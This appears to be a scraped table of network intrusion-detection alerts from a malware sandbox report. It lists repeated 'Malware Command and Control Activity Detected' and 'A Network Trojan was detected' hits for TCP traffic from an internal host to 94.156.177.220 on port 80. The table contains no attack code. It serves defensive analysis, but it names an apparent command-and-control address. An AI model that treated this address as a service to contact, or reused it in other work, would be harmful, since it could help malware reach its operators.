              2024-10-25T11:28:54.617931+020020243131Malware Command and Control Activity Detected192.168.2.184970494.156.177.22080TCP
              2024-10-25T11:28:55.862679+020020243131Malware Command and Control Activity Detected192.168.2.184970594.156.177.22080TCP
              2024-10-25T11:28:56.975286+020020243131Malware Command and Control Activity Detected192.168.2.184970694.156.177.22080TCP
              2024-10-25T11:28:58.095968+020020243131Malware Command and Control Activity Detected192.168.2.184970794.156.177.22080TCP
              2024-10-25T11:28:59.234508+020020243131Malware Command and Control Activity Detected192.168.2.184970894.156.177.22080TCP
              2024-10-25T11:29:00.353219+020020243131Malware Command and Control Activity Detected192.168.2.184970994.156.177.22080TCP
              2024-10-25T11:29:01.531090+020020243131Malware Command and Control Activity Detected192.168.2.184971094.156.177.22080TCP
              2024-10-25T11:29:02.646751+020020243131Malware Command and Control Activity Detected192.168.2.186416794.156.177.22080TCP
              2024-10-25T11:29:03.801675+020020243131Malware Command and Control Activity Detected192.168.2.186416894.156.177.22080TCP
              2024-10-25T11:29:04.946367+020020243131Malware Command and Control Activity Detected192.168.2.186416994.156.177.22080TCP
              2024-10-25T11:29:06.259464+020020243131Malware Command and Control Activity Detected192.168.2.186417094.156.177.22080TCP
              2024-10-25T11:29:07.385590+020020243131Malware Command and Control Activity Detected192.168.2.186417194.156.177.22080TCP
              2024-10-25T11:29:08.519765+020020243131Malware Command and Control Activity Detected192.168.2.186417294.156.177.22080TCP
              2024-10-25T11:29:09.656572+020020243131Malware Command and Control Activity Detected192.168.2.186417394.156.177.22080TCP
              2024-10-25T11:29:10.777113+020020243131Malware Command and Control Activity Detected192.168.2.186417494.156.177.22080TCP
              2024-10-25T11:29:11.912301+020020243131Malware Command and Control Activity Detected192.168.2.186417594.156.177.22080TCP
              2024-10-25T11:29:13.065589+020020243131Malware Command and Control Activity Detected192.168.2.186417694.156.177.22080TCP
              2024-10-25T11:29:14.182972+020020243131Malware Command and Control Activity Detected192.168.2.186417794.156.177.22080TCP
              2024-10-25T11:29:15.289955+020020243131Malware Command and Control Activity Detected192.168.2.186417894.156.177.22080TCP
              2024-10-25T11:29:16.463604+020020243131Malware Command and Control Activity Detected192.168.2.186417994.156.177.22080TCP
              2024-10-25T11:29:17.580609+020020243131Malware Command and Control Activity Detected192.168.2.186418094.156.177.22080TCP
              2024-10-25T11:29:18.746894+020020243131Malware Command and Control Activity Detected192.168.2.186418194.156.177.22080TCP
              2024-10-25T11:29:19.869747+020020243131Malware Command and Control Activity Detected192.168.2.186418294.156.177.22080TCP
              2024-10-25T11:29:20.985354+020020243131Malware Command and Control Activity Detected192.168.2.186418394.156.177.22080TCP
              2024-10-25T11:29:22.146065+020020243131Malware Command and Control Activity Detected192.168.2.186418494.156.177.22080TCP
              2024-10-25T11:29:23.266375+020020243131Malware Command and Control Activity Detected192.168.2.186418594.156.177.22080TCP
              2024-10-25T11:29:24.375334+020020243131Malware Command and Control Activity Detected192.168.2.186418694.156.177.22080TCP
              2024-10-25T11:29:25.510311+020020243131Malware Command and Control Activity Detected192.168.2.186418794.156.177.22080TCP
              2024-10-25T11:29:26.642221+020020243131Malware Command and Control Activity Detected192.168.2.186418894.156.177.22080TCP
              2024-10-25T11:29:27.763093+020020243131Malware Command and Control Activity Detected192.168.2.186418994.156.177.22080TCP
              2024-10-25T11:29:28.886582+020020243131Malware Command and Control Activity Detected192.168.2.186419094.156.177.22080TCP
              2024-10-25T11:29:30.002398+020020243131Malware Command and Control Activity Detected192.168.2.186419194.156.177.22080TCP
              2024-10-25T11:29:31.140397+020020243131Malware Command and Control Activity Detected192.168.2.186419294.156.177.22080TCP
              2024-10-25T11:29:32.242203+020020243131Malware Command and Control Activity Detected192.168.2.186419394.156.177.22080TCP
              2024-10-25T11:29:33.553138+020020243131Malware Command and Control Activity Detected192.168.2.186419494.156.177.22080TCP
              2024-10-25T11:29:34.708315+020020243131Malware Command and Control Activity Detected192.168.2.186419594.156.177.22080TCP
              2024-10-25T11:29:35.827262+020020243131Malware Command and Control Activity Detected192.168.2.186419694.156.177.22080TCP
              2024-10-25T11:29:36.964819+020020243131Malware Command and Control Activity Detected192.168.2.186419794.156.177.22080TCP
              2024-10-25T11:29:38.230014+020020243131Malware Command and Control Activity Detected192.168.2.186419894.156.177.22080TCP
              2024-10-25T11:29:39.375943+020020243131Malware Command and Control Activity Detected192.168.2.186419994.156.177.22080TCP
              2024-10-25T11:29:40.485305+020020243131Malware Command and Control Activity Detected192.168.2.186420194.156.177.22080TCP
              2024-10-25T11:29:41.621225+020020243131Malware Command and Control Activity Detected192.168.2.186420294.156.177.22080TCP
              2024-10-25T11:29:42.772430+020020243131Malware Command and Control Activity Detected192.168.2.186420394.156.177.22080TCP
              2024-10-25T11:29:43.910911+020020243131Malware Command and Control Activity Detected192.168.2.186420494.156.177.22080TCP
              2024-10-25T11:29:45.050226+020020243131Malware Command and Control Activity Detected192.168.2.186420694.156.177.22080TCP
              2024-10-25T11:29:46.161588+020020243131Malware Command and Control Activity Detected192.168.2.186420894.156.177.22080TCP
              2024-10-25T11:29:47.318468+020020243131Malware Command and Control Activity Detected192.168.2.186420994.156.177.22080TCP
              2024-10-25T11:29:48.436662+020020243131Malware Command and Control Activity Detected192.168.2.186421094.156.177.22080TCP
              2024-10-25T11:29:49.624131+020020243131Malware Command and Control Activity Detected192.168.2.186421194.156.177.22080TCP
              2024-10-25T11:29:50.760103+020020243131Malware Command and Control Activity Detected192.168.2.186421294.156.177.22080TCP
              2024-10-25T11:29:51.899613+020020243131Malware Command and Control Activity Detected192.168.2.186421394.156.177.22080TCP
              2024-10-25T11:29:53.042747+020020243131Malware Command and Control Activity Detected192.168.2.186421494.156.177.22080TCP
              2024-10-25T11:29:54.179032+020020243131Malware Command and Control Activity Detected192.168.2.186421594.156.177.22080TCP
              2024-10-25T11:29:55.303001+020020243131Malware Command and Control Activity Detected192.168.2.186421694.156.177.22080TCP
              2024-10-25T11:29:56.409678+020020243131Malware Command and Control Activity Detected192.168.2.186421794.156.177.22080TCP
              2024-10-25T11:29:57.542324+020020243131Malware Command and Control Activity Detected192.168.2.186421894.156.177.22080TCP
              2024-10-25T11:29:58.688177+020020243131Malware Command and Control Activity Detected192.168.2.186421994.156.177.22080TCP
              2024-10-25T11:29:59.817721+020020243131Malware Command and Control Activity Detected192.168.2.186422094.156.177.22080TCP
              2024-10-25T11:30:00.962221+020020243131Malware Command and Control Activity Detected192.168.2.186422194.156.177.22080TCP
              2024-10-25T11:30:02.098478+020020243131Malware Command and Control Activity Detected192.168.2.186422294.156.177.22080TCP
              2024-10-25T11:30:03.217205+020020243131Malware Command and Control Activity Detected192.168.2.186422394.156.177.22080TCP
              2024-10-25T11:30:04.399581+020020243131Malware Command and Control Activity Detected192.168.2.186422494.156.177.22080TCP
              2024-10-25T11:30:05.540849+020020243131Malware Command and Control Activity Detected192.168.2.186422594.156.177.22080TCP
              2024-10-25T11:30:06.669292+020020243131Malware Command and Control Activity Detected192.168.2.186422694.156.177.22080TCP
              2024-10-25T11:30:07.799168+020020243131Malware Command and Control Activity Detected192.168.2.186422794.156.177.22080TCP
              2024-10-25T11:30:08.935586+020020243131Malware Command and Control Activity Detected192.168.2.186422894.156.177.22080TCP
              2024-10-25T11:30:10.470620+020020243131Malware Command and Control Activity Detected192.168.2.186422994.156.177.22080TCP
              2024-10-25T11:30:11.701063+020020243131Malware Command and Control Activity Detected192.168.2.186423094.156.177.22080TCP
              2024-10-25T11:30:12.826647+020020243131Malware Command and Control Activity Detected192.168.2.186423194.156.177.22080TCP
              2024-10-25T11:30:13.983244+020020243131Malware Command and Control Activity Detected192.168.2.186423294.156.177.22080TCP
              2024-10-25T11:30:15.118902+020020243131Malware Command and Control Activity Detected192.168.2.186423394.156.177.22080TCP
              2024-10-25T11:30:16.294453+020020243131Malware Command and Control Activity Detected192.168.2.186423494.156.177.22080TCP
              2024-10-25T11:30:17.411489+020020243131Malware Command and Control Activity Detected192.168.2.186423594.156.177.22080TCP
              2024-10-25T11:30:18.532406+020020243131Malware Command and Control Activity Detected192.168.2.186423694.156.177.22080TCP
              2024-10-25T11:30:19.654275+020020243131Malware Command and Control Activity Detected192.168.2.186423794.156.177.22080TCP
              2024-10-25T11:30:20.781593+020020243131Malware Command and Control Activity Detected192.168.2.186423894.156.177.22080TCP
              2024-10-25T11:30:21.918750+020020243131Malware Command and Control Activity Detected192.168.2.186423994.156.177.22080TCP
              2024-10-25T11:30:23.048033+020020243131Malware Command and Control Activity Detected192.168.2.186424094.156.177.22080TCP
              2024-10-25T11:30:24.197759+020020243131Malware Command and Control Activity Detected192.168.2.186424194.156.177.22080TCP
              2024-10-25T11:30:25.471211+020020243131Malware Command and Control Activity Detected192.168.2.186424294.156.177.22080TCP
              2024-10-25T11:30:26.585470+020020243131Malware Command and Control Activity Detected192.168.2.186424394.156.177.22080TCP
              2024-10-25T11:30:27.719981+020020243131Malware Command and Control Activity Detected192.168.2.186424494.156.177.22080TCP
              2024-10-25T11:30:29.297651+020020243131Malware Command and Control Activity Detected192.168.2.186424594.156.177.22080TCP
              2024-10-25T11:30:30.435133+020020243131Malware Command and Control Activity Detected192.168.2.186424694.156.177.22080TCP
              2024-10-25T11:30:31.558444+020020243131Malware Command and Control Activity Detected192.168.2.186424794.156.177.22080TCP
              2024-10-25T11:30:32.702432+020020243131Malware Command and Control Activity Detected192.168.2.186424894.156.177.22080TCP
              2024-10-25T11:30:33.859385+020020243131Malware Command and Control Activity Detected192.168.2.186424994.156.177.22080TCP
              2024-10-25T11:30:34.998099+020020243131Malware Command and Control Activity Detected192.168.2.186425094.156.177.22080TCP
              2024-10-25T11:30:36.108883+020020243131Malware Command and Control Activity Detected192.168.2.186425194.156.177.22080TCP
              2024-10-25T11:30:37.259328+020020243131Malware Command and Control Activity Detected192.168.2.186425294.156.177.22080TCP
              2024-10-25T11:30:38.392292+020020243131Malware Command and Control Activity Detected192.168.2.186425394.156.177.22080TCP
              2024-10-25T11:30:39.531711+020020243131Malware Command and Control Activity Detected192.168.2.186425494.156.177.22080TCP
              2024-10-25T11:30:40.661278+020020243131Malware Command and Control Activity Detected192.168.2.186425594.156.177.22080TCP
              2024-10-25T11:30:41.782183+020020243131Malware Command and Control Activity Detected192.168.2.186425694.156.177.22080TCP
              2024-10-25T11:30:42.958639+020020243131Malware Command and Control Activity Detected192.168.2.186425794.156.177.22080TCP
              2024-10-25T11:30:44.090835+020020243131Malware Command and Control Activity Detected192.168.2.186425894.156.177.22080TCP
              2024-10-25T11:30:45.232719+020020243131Malware Command and Control Activity Detected192.168.2.186425994.156.177.22080TCP
              2024-10-25T11:30:46.403777+020020243131Malware Command and Control Activity Detected192.168.2.186426094.156.177.22080TCP
              2024-10-25T11:30:47.528668+020020243131Malware Command and Control Activity Detected192.168.2.186426194.156.177.22080TCP
              2024-10-25T11:30:48.674432+020020243131Malware Command and Control Activity Detected192.168.2.186426294.156.177.22080TCP
              2024-10-25T11:30:49.836930+020020243131Malware Command and Control Activity Detected192.168.2.186426394.156.177.22080TCP
              2024-10-25T11:30:50.990800+020020243131Malware Command and Control Activity Detected192.168.2.186426494.156.177.22080TCP
              2024-10-25T11:30:52.163502+020020243131Malware Command and Control Activity Detected192.168.2.186426594.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T11:28:51.833344+020020243181Malware Command and Control Activity Detected192.168.2.184970194.156.177.22080TCP
              2024-10-25T11:28:53.208596+020020243181Malware Command and Control Activity Detected192.168.2.184970394.156.177.22080TCP
              2024-10-25T11:28:54.617931+020020243181Malware Command and Control Activity Detected192.168.2.184970494.156.177.22080TCP
              2024-10-25T11:28:55.862679+020020243181Malware Command and Control Activity Detected192.168.2.184970594.156.177.22080TCP
              2024-10-25T11:28:56.975286+020020243181Malware Command and Control Activity Detected192.168.2.184970694.156.177.22080TCP
              2024-10-25T11:28:58.095968+020020243181Malware Command and Control Activity Detected192.168.2.184970794.156.177.22080TCP
              2024-10-25T11:28:59.234508+020020243181Malware Command and Control Activity Detected192.168.2.184970894.156.177.22080TCP
              2024-10-25T11:29:00.353219+020020243181Malware Command and Control Activity Detected192.168.2.184970994.156.177.22080TCP
              2024-10-25T11:29:01.531090+020020243181Malware Command and Control Activity Detected192.168.2.184971094.156.177.22080TCP
              2024-10-25T11:29:02.646751+020020243181Malware Command and Control Activity Detected192.168.2.186416794.156.177.22080TCP
              2024-10-25T11:29:03.801675+020020243181Malware Command and Control Activity Detected192.168.2.186416894.156.177.22080TCP
              2024-10-25T11:29:04.946367+020020243181Malware Command and Control Activity Detected192.168.2.186416994.156.177.22080TCP
              2024-10-25T11:29:06.259464+020020243181Malware Command and Control Activity Detected192.168.2.186417094.156.177.22080TCP
              2024-10-25T11:29:07.385590+020020243181Malware Command and Control Activity Detected192.168.2.186417194.156.177.22080TCP
              2024-10-25T11:29:08.519765+020020243181Malware Command and Control Activity Detected192.168.2.186417294.156.177.22080TCP
              2024-10-25T11:29:09.656572+020020243181Malware Command and Control Activity Detected192.168.2.186417394.156.177.22080TCP
              2024-10-25T11:29:10.777113+020020243181Malware Command and Control Activity Detected192.168.2.186417494.156.177.22080TCP
              2024-10-25T11:29:11.912301+020020243181Malware Command and Control Activity Detected192.168.2.186417594.156.177.22080TCP
              2024-10-25T11:29:13.065589+020020243181Malware Command and Control Activity Detected192.168.2.186417694.156.177.22080TCP
              2024-10-25T11:29:14.182972+020020243181Malware Command and Control Activity Detected192.168.2.186417794.156.177.22080TCP
              2024-10-25T11:29:15.289955+020020243181Malware Command and Control Activity Detected192.168.2.186417894.156.177.22080TCP
              2024-10-25T11:29:16.463604+020020243181Malware Command and Control Activity Detected192.168.2.186417994.156.177.22080TCP
              2024-10-25T11:29:17.580609+020020243181Malware Command and Control Activity Detected192.168.2.186418094.156.177.22080TCP
              2024-10-25T11:29:18.746894+020020243181Malware Command and Control Activity Detected192.168.2.186418194.156.177.22080TCP
              2024-10-25T11:29:19.869747+020020243181Malware Command and Control Activity Detected192.168.2.186418294.156.177.22080TCP
              2024-10-25T11:29:20.985354+020020243181Malware Command and Control Activity Detected192.168.2.186418394.156.177.22080TCP
              2024-10-25T11:29:22.146065+020020243181Malware Command and Control Activity Detected192.168.2.186418494.156.177.22080TCP
              2024-10-25T11:29:23.266375+020020243181Malware Command and Control Activity Detected192.168.2.186418594.156.177.22080TCP
              2024-10-25T11:29:24.375334+020020243181Malware Command and Control Activity Detected192.168.2.186418694.156.177.22080TCP
              2024-10-25T11:29:25.510311+020020243181Malware Command and Control Activity Detected192.168.2.186418794.156.177.22080TCP
              2024-10-25T11:29:26.642221+020020243181Malware Command and Control Activity Detected192.168.2.186418894.156.177.22080TCP
              2024-10-25T11:29:27.763093+020020243181Malware Command and Control Activity Detected192.168.2.186418994.156.177.22080TCP
              2024-10-25T11:29:28.886582+020020243181Malware Command and Control Activity Detected192.168.2.186419094.156.177.22080TCP
              2024-10-25T11:29:30.002398+020020243181Malware Command and Control Activity Detected192.168.2.186419194.156.177.22080TCP
              2024-10-25T11:29:31.140397+020020243181Malware Command and Control Activity Detected192.168.2.186419294.156.177.22080TCP
              2024-10-25T11:29:32.242203+020020243181Malware Command and Control Activity Detected192.168.2.186419394.156.177.22080TCP
              2024-10-25T11:29:33.553138+020020243181Malware Command and Control Activity Detected192.168.2.186419494.156.177.22080TCP
              2024-10-25T11:29:34.708315+020020243181Malware Command and Control Activity Detected192.168.2.186419594.156.177.22080TCP
              2024-10-25T11:29:35.827262+020020243181Malware Command and Control Activity Detected192.168.2.186419694.156.177.22080TCP
              2024-10-25T11:29:36.964819+020020243181Malware Command and Control Activity Detected192.168.2.186419794.156.177.22080TCP
              2024-10-25T11:29:38.230014+020020243181Malware Command and Control Activity Detected192.168.2.186419894.156.177.22080TCP
              2024-10-25T11:29:39.375943+020020243181Malware Command and Control Activity Detected192.168.2.186419994.156.177.22080TCP
              2024-10-25T11:29:40.485305+020020243181Malware Command and Control Activity Detected192.168.2.186420194.156.177.22080TCP
              2024-10-25T11:29:41.621225+020020243181Malware Command and Control Activity Detected192.168.2.186420294.156.177.22080TCP
              2024-10-25T11:29:42.772430+020020243181Malware Command and Control Activity Detected192.168.2.186420394.156.177.22080TCP
              2024-10-25T11:29:43.910911+020020243181Malware Command and Control Activity Detected192.168.2.186420494.156.177.22080TCP
              2024-10-25T11:29:45.050226+020020243181Malware Command and Control Activity Detected192.168.2.186420694.156.177.22080TCP
              2024-10-25T11:29:46.161588+020020243181Malware Command and Control Activity Detected192.168.2.186420894.156.177.22080TCP
              2024-10-25T11:29:47.318468+020020243181Malware Command and Control Activity Detected192.168.2.186420994.156.177.22080TCP
              2024-10-25T11:29:48.436662+020020243181Malware Command and Control Activity Detected192.168.2.186421094.156.177.22080TCP
              2024-10-25T11:29:49.624131+020020243181Malware Command and Control Activity Detected192.168.2.186421194.156.177.22080TCP
              2024-10-25T11:29:50.760103+020020243181Malware Command and Control Activity Detected192.168.2.186421294.156.177.22080TCP
              2024-10-25T11:29:51.899613+020020243181Malware Command and Control Activity Detected192.168.2.186421394.156.177.22080TCP
              2024-10-25T11:29:53.042747+020020243181Malware Command and Control Activity Detected192.168.2.186421494.156.177.22080TCP
              2024-10-25T11:29:54.179032+020020243181Malware Command and Control Activity Detected192.168.2.186421594.156.177.22080TCP
              2024-10-25T11:29:55.303001+020020243181Malware Command and Control Activity Detected192.168.2.186421694.156.177.22080TCP
              2024-10-25T11:29:56.409678+020020243181Malware Command and Control Activity Detected192.168.2.186421794.156.177.22080TCP
              2024-10-25T11:29:57.542324+020020243181Malware Command and Control Activity Detected192.168.2.186421894.156.177.22080TCP
              2024-10-25T11:29:58.688177+020020243181Malware Command and Control Activity Detected192.168.2.186421994.156.177.22080TCP
              2024-10-25T11:29:59.817721+020020243181Malware Command and Control Activity Detected192.168.2.186422094.156.177.22080TCP
              2024-10-25T11:30:00.962221+020020243181Malware Command and Control Activity Detected192.168.2.186422194.156.177.22080TCP
              2024-10-25T11:30:02.098478+020020243181Malware Command and Control Activity Detected192.168.2.186422294.156.177.22080TCP
              2024-10-25T11:30:03.217205+020020243181Malware Command and Control Activity Detected192.168.2.186422394.156.177.22080TCP
              2024-10-25T11:30:04.399581+020020243181Malware Command and Control Activity Detected192.168.2.186422494.156.177.22080TCP
              2024-10-25T11:30:05.540849+020020243181Malware Command and Control Activity Detected192.168.2.186422594.156.177.22080TCP
              2024-10-25T11:30:06.669292+020020243181Malware Command and Control Activity Detected192.168.2.186422694.156.177.22080TCP
              2024-10-25T11:30:07.799168+020020243181Malware Command and Control Activity Detected192.168.2.186422794.156.177.22080TCP
              2024-10-25T11:30:08.935586+020020243181Malware Command and Control Activity Detected192.168.2.186422894.156.177.22080TCP
              2024-10-25T11:30:10.470620+020020243181Malware Command and Control Activity Detected192.168.2.186422994.156.177.22080TCP
              2024-10-25T11:30:11.701063+020020243181Malware Command and Control Activity Detected192.168.2.186423094.156.177.22080TCP
              2024-10-25T11:30:12.826647+020020243181Malware Command and Control Activity Detected192.168.2.186423194.156.177.22080TCP
              2024-10-25T11:30:13.983244+020020243181Malware Command and Control Activity Detected192.168.2.186423294.156.177.22080TCP
              2024-10-25T11:30:15.118902+020020243181Malware Command and Control Activity Detected192.168.2.186423394.156.177.22080TCP
              2024-10-25T11:30:16.294453+020020243181Malware Command and Control Activity Detected192.168.2.186423494.156.177.22080TCP
              2024-10-25T11:30:17.411489+020020243181Malware Command and Control Activity Detected192.168.2.186423594.156.177.22080TCP
              2024-10-25T11:30:18.532406+020020243181Malware Command and Control Activity Detected192.168.2.186423694.156.177.22080TCP
              2024-10-25T11:30:19.654275+020020243181Malware Command and Control Activity Detected192.168.2.186423794.156.177.22080TCP
              2024-10-25T11:30:20.781593+020020243181Malware Command and Control Activity Detected192.168.2.186423894.156.177.22080TCP
              2024-10-25T11:30:21.918750+020020243181Malware Command and Control Activity Detected192.168.2.186423994.156.177.22080TCP
              2024-10-25T11:30:23.048033+020020243181Malware Command and Control Activity Detected192.168.2.186424094.156.177.22080TCP
              2024-10-25T11:30:24.197759+020020243181Malware Command and Control Activity Detected192.168.2.186424194.156.177.22080TCP
              2024-10-25T11:30:25.471211+020020243181Malware Command and Control Activity Detected192.168.2.186424294.156.177.22080TCP
              2024-10-25T11:30:26.585470+020020243181Malware Command and Control Activity Detected192.168.2.186424394.156.177.22080TCP
              2024-10-25T11:30:27.719981+020020243181Malware Command and Control Activity Detected192.168.2.186424494.156.177.22080TCP
              2024-10-25T11:30:29.297651+020020243181Malware Command and Control Activity Detected192.168.2.186424594.156.177.22080TCP
              2024-10-25T11:30:30.435133+020020243181Malware Command and Control Activity Detected192.168.2.186424694.156.177.22080TCP
              2024-10-25T11:30:31.558444+020020243181Malware Command and Control Activity Detected192.168.2.186424794.156.177.22080TCP
              2024-10-25T11:30:32.702432+020020243181Malware Command and Control Activity Detected192.168.2.186424894.156.177.22080TCP
              2024-10-25T11:30:33.859385+020020243181Malware Command and Control Activity Detected192.168.2.186424994.156.177.22080TCP
              2024-10-25T11:30:34.998099+020020243181Malware Command and Control Activity Detected192.168.2.186425094.156.177.22080TCP
              2024-10-25T11:30:36.108883+020020243181Malware Command and Control Activity Detected192.168.2.186425194.156.177.22080TCP
              2024-10-25T11:30:37.259328+020020243181Malware Command and Control Activity Detected192.168.2.186425294.156.177.22080TCP
              2024-10-25T11:30:38.392292+020020243181Malware Command and Control Activity Detected192.168.2.186425394.156.177.22080TCP
              2024-10-25T11:30:39.531711+020020243181Malware Command and Control Activity Detected192.168.2.186425494.156.177.22080TCP
              2024-10-25T11:30:40.661278+020020243181Malware Command and Control Activity Detected192.168.2.186425594.156.177.22080TCP
              2024-10-25T11:30:41.782183+020020243181Malware Command and Control Activity Detected192.168.2.186425694.156.177.22080TCP
              2024-10-25T11:30:42.958639+020020243181Malware Command and Control Activity Detected192.168.2.186425794.156.177.22080TCP
              2024-10-25T11:30:44.090835+020020243181Malware Command and Control Activity Detected192.168.2.186425894.156.177.22080TCP
              2024-10-25T11:30:45.232719+020020243181Malware Command and Control Activity Detected192.168.2.186425994.156.177.22080TCP
              2024-10-25T11:30:46.403777+020020243181Malware Command and Control Activity Detected192.168.2.186426094.156.177.22080TCP
              2024-10-25T11:30:47.528668+020020243181Malware Command and Control Activity Detected192.168.2.186426194.156.177.22080TCP
              2024-10-25T11:30:48.674432+020020243181Malware Command and Control Activity Detected192.168.2.186426294.156.177.22080TCP
              2024-10-25T11:30:49.836930+020020243181Malware Command and Control Activity Detected192.168.2.186426394.156.177.22080TCP
              2024-10-25T11:30:50.990800+020020243181Malware Command and Control Activity Detected192.168.2.186426494.156.177.22080TCP
              2024-10-25T11:30:52.163502+020020243181Malware Command and Control Activity Detected192.168.2.186426594.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T11:28:48.526456+020020216411A Network Trojan was detected192.168.2.184969994.156.177.22080TCP
              2024-10-25T11:28:49.651298+020020216411A Network Trojan was detected192.168.2.184970094.156.177.22080TCP
              2024-10-25T11:28:50.712196+020020216411A Network Trojan was detected192.168.2.184970194.156.177.22080TCP
              2024-10-25T11:28:52.217576+020020216411A Network Trojan was detected192.168.2.184970394.156.177.22080TCP
              2024-10-25T11:28:53.615196+020020216411A Network Trojan was detected192.168.2.184970494.156.177.22080TCP
              2024-10-25T11:28:54.898490+020020216411A Network Trojan was detected192.168.2.184970594.156.177.22080TCP
              2024-10-25T11:28:56.017260+020020216411A Network Trojan was detected192.168.2.184970694.156.177.22080TCP
              2024-10-25T11:28:57.125135+020020216411A Network Trojan was detected192.168.2.184970794.156.177.22080TCP
              2024-10-25T11:28:58.258304+020020216411A Network Trojan was detected192.168.2.184970894.156.177.22080TCP
              2024-10-25T11:28:59.390884+020020216411A Network Trojan was detected192.168.2.184970994.156.177.22080TCP
              2024-10-25T11:29:00.530239+020020216411A Network Trojan was detected192.168.2.184971094.156.177.22080TCP
              2024-10-25T11:29:01.681309+020020216411A Network Trojan was detected192.168.2.186416794.156.177.22080TCP
              2024-10-25T11:29:02.822243+020020216411A Network Trojan was detected192.168.2.186416894.156.177.22080TCP
              2024-10-25T11:29:03.983922+020020216411A Network Trojan was detected192.168.2.186416994.156.177.22080TCP
              2024-10-25T11:29:05.122017+020020216411A Network Trojan was detected192.168.2.186417094.156.177.22080TCP
              2024-10-25T11:29:06.430963+020020216411A Network Trojan was detected192.168.2.186417194.156.177.22080TCP
              2024-10-25T11:29:07.550024+020020216411A Network Trojan was detected192.168.2.186417294.156.177.22080TCP
              2024-10-25T11:29:08.684720+020020216411A Network Trojan was detected192.168.2.186417394.156.177.22080TCP
              2024-10-25T11:29:09.814451+020020216411A Network Trojan was detected192.168.2.186417494.156.177.22080TCP
              2024-10-25T11:29:10.949279+020020216411A Network Trojan was detected192.168.2.186417594.156.177.22080TCP
              2024-10-25T11:29:12.081936+020020216411A Network Trojan was detected192.168.2.186417694.156.177.22080TCP
              2024-10-25T11:29:13.223654+020020216411A Network Trojan was detected192.168.2.186417794.156.177.22080TCP
              2024-10-25T11:29:14.340855+020020216411A Network Trojan was detected192.168.2.186417894.156.177.22080TCP
              2024-10-25T11:29:15.464654+020020216411A Network Trojan was detected192.168.2.186417994.156.177.22080TCP
              2024-10-25T11:29:16.633739+020020216411A Network Trojan was detected192.168.2.186418094.156.177.22080TCP
              2024-10-25T11:29:17.750103+020020216411A Network Trojan was detected192.168.2.186418194.156.177.22080TCP
              2024-10-25T11:29:18.913135+020020216411A Network Trojan was detected192.168.2.186418294.156.177.22080TCP
              2024-10-25T11:29:20.023984+020020216411A Network Trojan was detected192.168.2.186418394.156.177.22080TCP
              2024-10-25T11:29:21.158391+020020216411A Network Trojan was detected192.168.2.186418494.156.177.22080TCP
              2024-10-25T11:29:22.318196+020020216411A Network Trojan was detected192.168.2.186418594.156.177.22080TCP
              2024-10-25T11:29:23.422578+020020216411A Network Trojan was detected192.168.2.186418694.156.177.22080TCP
              2024-10-25T11:29:24.535211+020020216411A Network Trojan was detected192.168.2.186418794.156.177.22080TCP
              2024-10-25T11:29:25.670775+020020216411A Network Trojan was detected192.168.2.186418894.156.177.22080TCP
              2024-10-25T11:29:26.793846+020020216411A Network Trojan was detected192.168.2.186418994.156.177.22080TCP
              2024-10-25T11:29:27.935220+020020216411A Network Trojan was detected192.168.2.186419094.156.177.22080TCP
              2024-10-25T11:29:29.054472+020020216411A Network Trojan was detected192.168.2.186419194.156.177.22080TCP
              2024-10-25T11:29:30.177026+020020216411A Network Trojan was detected192.168.2.186419294.156.177.22080TCP
              2024-10-25T11:29:31.301159+020020216411A Network Trojan was detected192.168.2.186419394.156.177.22080TCP
              2024-10-25T11:29:32.403178+020020216411A Network Trojan was detected192.168.2.186419494.156.177.22080TCP
              2024-10-25T11:29:33.723057+020020216411A Network Trojan was detected192.168.2.186419594.156.177.22080TCP
              2024-10-25T11:29:34.874543+020020216411A Network Trojan was detected192.168.2.186419694.156.177.22080TCP
              2024-10-25T11:29:35.995240+020020216411A Network Trojan was detected192.168.2.186419794.156.177.22080TCP
              2024-10-25T11:29:37.269058+020020216411A Network Trojan was detected192.168.2.186419894.156.177.22080TCP
              2024-10-25T11:29:38.397005+020020216411A Network Trojan was detected192.168.2.186419994.156.177.22080TCP
              2024-10-25T11:29:39.536926+020020216411A Network Trojan was detected192.168.2.186420194.156.177.22080TCP
              2024-10-25T11:29:40.654260+020020216411A Network Trojan was detected192.168.2.186420294.156.177.22080TCP
              2024-10-25T11:29:41.790844+020020216411A Network Trojan was detected192.168.2.186420394.156.177.22080TCP
              2024-10-25T11:29:42.941323+020020216411A Network Trojan was detected192.168.2.186420494.156.177.22080TCP
              2024-10-25T11:29:44.078643+020020216411A Network Trojan was detected192.168.2.186420694.156.177.22080TCP
              2024-10-25T11:29:45.213270+020020216411A Network Trojan was detected192.168.2.186420894.156.177.22080TCP
              2024-10-25T11:29:46.330109+020020216411A Network Trojan was detected192.168.2.186420994.156.177.22080TCP
              2024-10-25T11:29:47.482694+020020216411A Network Trojan was detected192.168.2.186421094.156.177.22080TCP
              2024-10-25T11:29:48.605816+020020216411A Network Trojan was detected192.168.2.186421194.156.177.22080TCP
              2024-10-25T11:29:49.798794+020020216411A Network Trojan was detected192.168.2.186421294.156.177.22080TCP
              2024-10-25T11:29:50.934440+020020216411A Network Trojan was detected192.168.2.186421394.156.177.22080TCP
              2024-10-25T11:29:52.064655+020020216411A Network Trojan was detected192.168.2.186421494.156.177.22080TCP
              2024-10-25T11:29:53.204009+020020216411A Network Trojan was detected192.168.2.186421594.156.177.22080TCP
              2024-10-25T11:29:54.349067+020020216411A Network Trojan was detected192.168.2.186421694.156.177.22080TCP
              2024-10-25T11:29:55.463755+020020216411A Network Trojan was detected192.168.2.186421794.156.177.22080TCP
              2024-10-25T11:29:56.583523+020020216411A Network Trojan was detected192.168.2.186421894.156.177.22080TCP
              2024-10-25T11:29:57.714329+020020216411A Network Trojan was detected192.168.2.186421994.156.177.22080TCP
              2024-10-25T11:29:58.866731+020020216411A Network Trojan was detected192.168.2.186422094.156.177.22080TCP
              2024-10-25T11:29:59.980749+020020216411A Network Trojan was detected192.168.2.186422194.156.177.22080TCP
              2024-10-25T11:30:01.127492+020020216411A Network Trojan was detected192.168.2.186422294.156.177.22080TCP
              2024-10-25T11:30:02.258244+020020216411A Network Trojan was detected192.168.2.186422394.156.177.22080TCP
              2024-10-25T11:30:03.396659+020020216411A Network Trojan was detected192.168.2.186422494.156.177.22080TCP
              2024-10-25T11:30:04.577592+020020216411A Network Trojan was detected192.168.2.186422594.156.177.22080TCP
              2024-10-25T11:30:05.709458+020020216411A Network Trojan was detected192.168.2.186422694.156.177.22080TCP
